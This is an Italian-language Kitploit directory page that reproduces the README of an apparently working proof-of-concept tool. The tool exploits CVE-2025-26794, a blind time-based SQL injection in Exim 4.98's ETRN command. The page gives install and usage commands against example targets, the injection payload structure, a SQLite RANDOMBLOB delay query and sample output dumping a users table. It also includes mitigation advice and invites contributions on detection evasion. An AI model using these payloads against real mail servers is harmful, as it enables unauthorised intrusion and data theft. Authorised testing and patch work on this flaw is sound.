Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-26794-exploit — Exploit di SQL injection per CVE-2025-26794 in Exim 4.98. Estrazione automatizzata dei dati tramite SQLi blind basata sul tempo. Solo per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/xploitgh0st/cve-2025-26794-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubxploitgh0st/cve-2025-26794-exploit

CVE-2025-26794-exploit

Exploit di SQL injection per CVE-2025-26794 in Exim 4.98. Estrazione automatizzata dei dati tramite SQLi blind basata sul tempo. Solo per test di penetrazione autorizzati.

Vedi Repository
2410 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-26794: Exploit di SQL Injection ETRN in Exim

Python Version License Status

Uno strumento proof-of-concept per CVE-2025-26794, che dimostra la vulnerabilità di SQL injection nel server di posta Exim 4.98 tramite il comando ETRN quando si utilizza l'archiviazione DBM SQLite.

⚠️ Disclaimer Legale

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. L'accesso non autorizzato a sistemi informatici è illegale ai sensi di diverse leggi, tra cui:

  • Computer Fraud and Abuse Act (CFAA) negli Stati Uniti
  • Computer Misuse Act nel Regno Unito
  • Legislazione analoga in altre giurisdizioni

È necessario disporre di un'autorizzazione scritta esplicita prima di testare qualsiasi sistema che non si possiede.

Gli autori e i collaboratori non si assumono alcuna responsabilità per usi impropri o danni causati da questo strumento.

📋 Panoramica della Vulnerabilità

CVE-2025-26794 è una vulnerabilità di SQL injection in Exim 4.98 che si verifica quando:

  • Exim è configurato con archiviazione DBM SQLite
  • Il gestore del comando ETRN elabora dati serializzati
  • L'input controllato dall'utente non viene adeguatamente sanitizzato prima della costruzione della query SQL

Questa vulnerabilità consente agli attaccanti di:

  • Estrarre dati sensibili dal database del server di posta
  • Eseguire attacchi di SQL injection cieca basata sul tempo
  • Enumerare la struttura del database (tabelle, colonne, dati)

Versioni Interessate

  • Exim 4.98 con configurazione DBM SQLite

Vettore d'Attacco

  • Servizio SMTP accessibile dalla rete (tipicamente porta 25)
  • Nessuna autenticazione richiesta (comando ETRN disponibile pre-autenticazione)

🚀 Funzionalità

  • Test di Vulnerabilità: Controllo automatizzato per confermare se il target è vulnerabile
  • SQL Injection Cieca Basata sul Tempo: Utilizza tecniche di ritardo temporale SQLite per l'estrazione dei dati
  • Ottimizzazione con Ricerca Binaria: Estrazione efficiente carattere per carattere
  • Dump Automatico del Database: Estrae tabelle, colonne e dati di esempio
  • Modalità Interattiva: Esegui query SQL personalizzate in modo interattivo
  • Funzionamento Multi-Modale: Strategie di estrazione flessibili

📦 Installazione

Requisiti

  • Python 3.6 o superiore
  • Accesso di rete al server SMTP target

Configurazione

root@kitploit:~
# Clona il repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit

# Installa le dipendenze (nessuna richiesta - utilizza solo la libreria standard)
pip install -r requirements.txt

# Rendi eseguibile lo script (Linux/Mac)
chmod +x exploit.py

💻 Utilizzo

Sintassi di Base

root@kitploit:~
python3 exploit.py <target> [options]

Esempi Rapidi

1. Verifica se il Target è Vulnerabile

root@kitploit:~
python3 exploit.py 192.168.1.10 --test-only

2. Dump Automatico del Database

root@kitploit:~
python3 exploit.py mail.example.com --auto-dump

3. Modalità Query SQL Interattiva

root@kitploit:~
python3 exploit.py 10.0.0.5 --interactive

4. Estrazione della Struttura di una Tabella Specifica

root@kitploit:~
python3 exploit.py 192.168.1.10 --table users --columns

5. Esecuzione di una Query SQL Personalizzata

root@kitploit:~
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"

Opzioni della Riga di Comando

OpzioneDescrizione
hostHostname o indirizzo IP del target (obbligatorio)
-p, --portPorta SMTP (predefinita: 25)
-t, --timeoutTimeout del socket in secondi (predefinito: 30)
--thresholdSoglia di ritardo temporale per il rilevamento (predefinita: 0.8s)
--test-onlyTesta solo la vulnerabilità, nessuna estrazione di dati
--auto-dumpDump automatico della struttura e dei dati del database
--interactiveAvvia la console interattiva per query SQL
--table TABLESeleziona una tabella specifica per l'estrazione
--columnsEstrae i nomi delle colonne (da usare con --table)
--query QUERYEsegue una query SQL personalizzata

🔍 Come Funziona

Flusso dell'Attacco

  1. Connessione: Stabilisce una connessione SMTP al server target
  2. Misurazione della Baseline: Invia un comando ETRN normale per misurare il tempo di risposta
  3. Test di Iniezione: Invia un payload SQL con ritardo temporale per confermare la vulnerabilità
  4. Estrazione dei Dati: Utilizza la ricerca binaria con SQL injection cieca basata sul tempo per estrarre i dati carattere per carattere

Struttura del Payload di SQL Injection

root@kitploit:~
ETRN #',1); <MALICIOUS_QUERY> /*

Il payload sfrutta una sanitizzazione impropria nel gestore di serializzazione ETRN, consentendo l'iniezione di SQL nelle query SQLite.

Rilevamento Basato sul Tempo

Utilizza il ritardo temporale specifico di SQLite:

root@kitploit:~
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))

Questo crea un ritardo misurabile (~1-2 secondi) quando la condizione è vera.

📊 Esempio di Output

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
║                  FOR AUTHORIZED USE ONLY                  ║
╚═══════════════════════════════════════════════════════════╝

[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s

[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users

[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email

🛡️ Mitigazione

Se stai eseguendo Exim 4.98 con DBM SQLite:

  1. Aggiorna Exim: Esegui l'upgrade alla versione con patch (4.98.1 o successiva)
  2. Validazione degli Input: Implementa una validazione rigorosa del comando ETRN
  3. Query Parametrizzate: Utilizza prepared statement per tutte le operazioni sul database
  4. Regole Firewall: Limita l'accesso SMTP alle reti fidate
  5. Disabilita ETRN: Se non necessario, disabilita il comando ETRN nella configurazione di Exim

🔧 Dettagli Tecnici

Algoritmo di Ricerca Binaria

Lo strumento utilizza la ricerca binaria per estrarre i caratteri in modo efficiente:

  • Intervallo ASCII stampabile: 32-126
  • Query medie per carattere: ~7 (log₂ 94)
  • Ottimizzato per un traffico di rete minimo

Funzioni SQLite Utilizzate

  • unicode(): Ottiene il valore ASCII del carattere
  • substr(): Estrae una sottostringa dal risultato
  • sqlite_master: Tabella di sistema per l'enumerazione dello schema
  • pragma_table_info(): Estrazione dei metadati delle colonne

📚 Riferimenti

  • Dettagli CVE: CVE-2025-26794
  • Advisory di Sicurezza Exim: [Advisory Ufficiale Exim]
  • OWASP SQL Injection: Guida OWASP

🤝 Contributi

I contributi sono benvenuti per:

  • Ottimizzazioni delle prestazioni
  • Tecniche di estrazione aggiuntive
  • Metodi di evasione del rilevamento
  • Correzione di bug e miglioramenti

Assicurati che tutti i contributi includano:

  • Documentazione chiara
  • Linee guida per la divulgazione responsabile
  • Avvisi sull'uso legale

📝 Licenza

Questo progetto è rilasciato a soli fini educativi. Usalo in modo responsabile e legale.

👤 Autore

XploitGh0st

  • GitHub: @XploitGh0st

🙏 Ringraziamenti

  • Il team di sviluppo di Exim per la gestione responsabile della vulnerabilità
  • La comunità di ricerca sulla sicurezza
  • I ricercatori sulle tecniche di SQL injection basata sul tempo in SQLite

⚖️ Divulgazione Responsabile

Se scopri vulnerabilità utilizzando questo strumento:

  1. Non divulgare pubblicamente i dettagli immediatamente
  2. Contatta privatamente il fornitore/mantenitore
  3. Concedi un tempo ragionevole per il rilascio della patch (tipicamente 90 giorni)
  4. Segui le linee guida per la divulgazione coordinata

Ricorda: Da un grande potere deriva una grande responsabilità. Usa questo strumento in modo etico e legale.

Scarica lo strumento